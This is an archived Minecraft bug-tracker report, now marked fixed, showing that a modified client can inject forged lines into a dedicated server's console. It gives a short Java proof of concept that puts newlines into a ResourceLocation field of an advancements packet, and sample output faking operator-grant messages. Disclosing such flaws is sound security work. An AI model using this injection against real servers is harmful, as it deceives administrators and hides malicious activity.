Mojira Archive
MC-235672

Modified client can print arbitrary text into server's console

Using a modified client on a Vanilla server, any packet containing a ResourceLoation offers the possibility of printing any arbitrary text into the server's console by using invalid namespace/path formats, which are then printed, including line breaks and special characters.

The prints occur in the ResourceLocation constructor in the ResourceLocationException messages.

Example of this in action:

[12:08:26] [Server thread/INFO]: 0x55 lost connection: Internal Exception: io.netty.handler.codec.DecoderException: aa: Non [a-z0-9_.-] character in namespace of location:
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Unsuspicious log message
[12:08:36 INFO]: Set 0x55's game mode to Creative Mode
[12:08:36 INFO]: Made 0x55 a server operator
[12:08:26] [Server thread/INFO]: 0x55 left the game

 

Using the following client modification (sending a ServerboundSeenAdvancementsPacket with the given ResourceLocation:

{
    logArbitraryMessage("""
        ...
        [12:08:36 INFO]: Unsuspicious log message
        [12:08:36 INFO]: Set 0x55's game mode to Creative Mode
        [12:08:36 INFO]: Made 0x55 a server operator""");
}

private void logArbitraryMessage(final String message) {
    final CustomIdentifier identifier = new CustomIdentifier("\n" + message);
    final ServerboundSeenAdvancementsPacket packet = new ServerboundSeenAdvancementsPacket(ServerboundSeenAdvancementsPacket.Action.OPENED_TAB, identifier);
    minecraft.getConnection().send(packet);
}

public final class CustomIdentifier extends ResourceLocation {
    private final String s;

    public CustomIdentifier(final String s) {
        super("");
        this.s = s;
    }

    @Override
    public String toString() {
        return this.s;
    }
}

 

Where you could just flood away the error with dozens of line breaks and give server owners a major creep.

Fixed

[Mod] Nassim Jahnke

[Mojang] slicedlime

2021-08-31, 07:52 PM

2023-05-25, 02:24 PM

2023-05-25, 02:24 PM

2

2

Plausible

Important

Dedicated Server

1.17.1, 1.18.1

1.20 Pre-release 6